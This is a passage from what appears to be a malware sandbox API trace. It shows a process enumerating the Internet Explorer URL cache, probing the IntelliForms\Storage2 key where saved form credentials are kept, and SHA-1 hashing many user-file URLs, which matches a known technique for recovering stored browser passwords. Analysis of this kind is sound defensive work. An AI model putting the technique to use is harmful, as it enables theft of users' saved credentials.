hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.318] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 0 [0067.318] GetLastError () returned 0x103 [0067.318] FindCloseUrlCache (hEnumHandle=0x1) returned 1 [0067.319] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x198250 | out: phkResult=0x198250*=0x0) returned 0x2 [0067.319] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x74c60000 [0067.319] GetProcAddress (hModule=0x74c60000, lpProcName="CryptAcquireContextA") returned 0x74c80c00 [0067.319] GetProcAddress (hModule=0x74c60000, lpProcName="CryptReleaseContext") returned 0x74c80ad0 [0067.320] GetProcAddress (hModule=0x74c60000, lpProcName="CryptCreateHash") returned 0x74c7f930 [0067.320] GetProcAddress (hModule=0x74c60000, lpProcName="CryptGetHashParam") returned 0x74c7f530 [0067.320] GetProcAddress (hModule=0x74c60000, lpProcName="CryptHashData") returned 0x74c7f950 [0067.320] GetProcAddress (hModule=0x74c60000, lpProcName="CryptDestroyHash") returned 0x74c7fbf0 [0067.320] CryptAcquireContextA (in: phProv=0x199278, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x199278*=0x671840) returned 1 [0067.324] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned 0x3c [0067.324] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/d4uat.flv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/d4uat.flv" [0067.324] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.324] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/d4uat.flv") returned 0x3c [0067.324] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.324] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.324] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.324] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/d4uat.flv") returned 0x3c [0067.324] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.324] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/d4uat.flv/") returned 0x3d [0067.324] CryptHashData (hHash=0x65ed08, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.325] CryptGetHashParam (in: hHash=0x65ed08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.325] CryptDestroyHash (hHash=0x65ed08) returned 1 [0067.325] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned 0x38 [0067.325] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh") returned="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh" [0067.325] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh") returned 0x38 [0067.325] CryptHashData (hHash=0x65ecc8, pbData=0x198270, dwDataLen=0x72, dwFlags=0x0) returned 1 [0067.325] CryptGetHashParam (in: hHash=0x65ecc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.325] CryptDestroyHash (hHash=0x65ecc8) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh") returned 0x38 [0067.325] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/") returned 0x39 [0067.325] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x74, dwFlags=0x0) returned 1 [0067.325] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.325] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.325] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 0x4e [0067.325] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/emg2issn89kh1rcqnkve.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/emg2issn89kh1rcqnkve.mp3" [0067.325] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/emg2issn89kh1rcqnkve.mp3") returned 0x4e [0067.325] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x9e, dwFlags=0x0) returned 1 [0067.325] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.325] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/emg2issn89kh1rcqnkve.mp3") returned 0x4e [0067.325] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/emg2issn89kh1rcqnkve.mp3/") returned 0x4f [0067.325] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0067.325] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.325] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.325] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned 0x55 [0067.325] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/fxz4eue2j3.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/fxz4eue2j3.jpg" [0067.325] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/fxz4eue2j3.jpg") returned 0x55 [0067.325] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0xac, dwFlags=0x0) returned 1 [0067.325] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.325] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/fxz4eue2j3.jpg") returned 0x55 [0067.325] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/5-kbyj32q24z/fxz4eue2j3.jpg/") returned 0x56 [0067.325] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xae, dwFlags=0x0) returned 1 [0067.325] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.325] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.325] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned 0x5e [0067.325] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/27qyanvwcf-uw/81p7puilogx.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/27qyanvwcf-uw/81p7puilogx.jpg" [0067.325] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.325] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/27qyanvwcf-uw/81p7puilogx.jpg") returned 0x5e [0067.325] CryptHashData (hHash=0x65ed08, pbData=0x198270, dwDataLen=0xbe, dwFlags=0x0) returned 1 [0067.325] CryptGetHashParam (in: hHash=0x65ed08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.326] CryptDestroyHash (hHash=0x65ed08) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/27qyanvwcf-uw/81p7puilogx.jpg") returned 0x5e [0067.326] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/27qyanvwcf-uw/81p7puilogx.jpg/") returned 0x5f [0067.326] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0067.326] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.326] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.326] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 0x3e [0067.326] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/tw6w.m4a") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/tw6w.m4a" [0067.326] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/tw6w.m4a") returned 0x3e [0067.326] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.326] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.326] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/tw6w.m4a") returned 0x3e [0067.326] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/tw6w.m4a/") returned 0x3f [0067.326] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.326] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.326] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.326] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 0x3f [0067.326] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/cf59qvhy72f0q.mp3") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/cf59qvhy72f0q.mp3" [0067.326] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/cf59qvhy72f0q.mp3") returned 0x3f [0067.326] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.326] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.326] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/cf59qvhy72f0q.mp3") returned 0x3f [0067.326] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/cf59qvhy72f0q.mp3/") returned 0x40 [0067.326] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.326] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.326] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.326] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 0x3e [0067.326] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/zdq%20yjy.m4a") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/zdq%20yjy.m4a" [0067.326] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/zdq%20yjy.m4a") returned 0x3e [0067.326] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.326] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.326] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/zdq%20yjy.m4a") returned 0x3e [0067.326] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.326] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/zdq%20yjy.m4a/") returned 0x3f [0067.326] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.326] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.326] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.326] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned 0x39 [0067.326] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj") returned="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj" [0067.327] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj") returned 0x39 [0067.327] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x74, dwFlags=0x0) returned 1 [0067.327] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.327] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj") returned 0x39 [0067.327] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/") returned 0x3a [0067.327] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x76, dwFlags=0x0) returned 1 [0067.327] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.327] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.327] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned 0x37 [0067.327] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/d6qum4brmjv.csv") returned="file:///c:/users/ciihmnxmn6ps/documents/d6qum4brmjv.csv" [0067.327] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/d6qum4brmjv.csv") returned 0x37 [0067.327] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x70, dwFlags=0x0) returned 1 [0067.327] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.327] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/d6qum4brmjv.csv") returned 0x37 [0067.327] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/documents/d6qum4brmjv.csv/") returned 0x38 [0067.327] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x72, dwFlags=0x0) returned 1 [0067.327] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.327] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.327] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned 0x50 [0067.327] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/vboykhauavu.gif") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/vboykhauavu.gif" [0067.327] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/vboykhauavu.gif") returned 0x50 [0067.327] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0xa2, dwFlags=0x0) returned 1 [0067.327] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.327] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/vboykhauavu.gif") returned 0x50 [0067.327] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/vboykhauavu.gif/") returned 0x51 [0067.327] CryptHashData (hHash=0x65ed88, pbData=0x198270, dwDataLen=0xa4, dwFlags=0x0) returned 1 [0067.327] CryptGetHashParam (in: hHash=0x65ed88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.327] CryptDestroyHash (hHash=0x65ed88) returned 1 [0067.327] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned 0x3a [0067.327] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw" [0067.327] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw") returned 0x3a [0067.327] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x76, dwFlags=0x0) returned 1 [0067.327] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.327] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw") returned 0x3a [0067.327] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.327] wcslen (_String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/") returned 0x3b [0067.327] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x78, dwFlags=0x0) returned 1 [0067.328] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.328] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.328] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned 0x3f [0067.328] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/rh4ai2hpiny%20i8w-hj_.jpg") returned="file:///c:/users/ciihmnxmn6ps/desktop/rh4ai2hpiny%20i8w-hj_.jpg" [0067.328] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.328] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/rh4ai2hpiny%20i8w-hj_.jpg") returned 0x3f [0067.328] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x80, dwFlags=0x0) returned 1 [0067.328] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.328] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.328] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/rh4ai2hpiny%20i8w-hj_.jpg") returned 0x3f [0067.328] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.328] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/rh4ai2hpiny%20i8w-hj_.jpg/") returned 0x40 [0067.328] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.328] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.328] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.328] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned 0x48 [0067.328] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/eeyb71dci6e0acglsyj.mp3") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/eeyb71dci6e0acglsyj.mp3" [0067.328] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.328] wcslen (_String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/eeyb71dci6e0acglsyj.mp3") returned 0x48 [0067.328] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x92, dwFlags=0x0) returned 1 [0067.328] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.328] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.328] wcslen 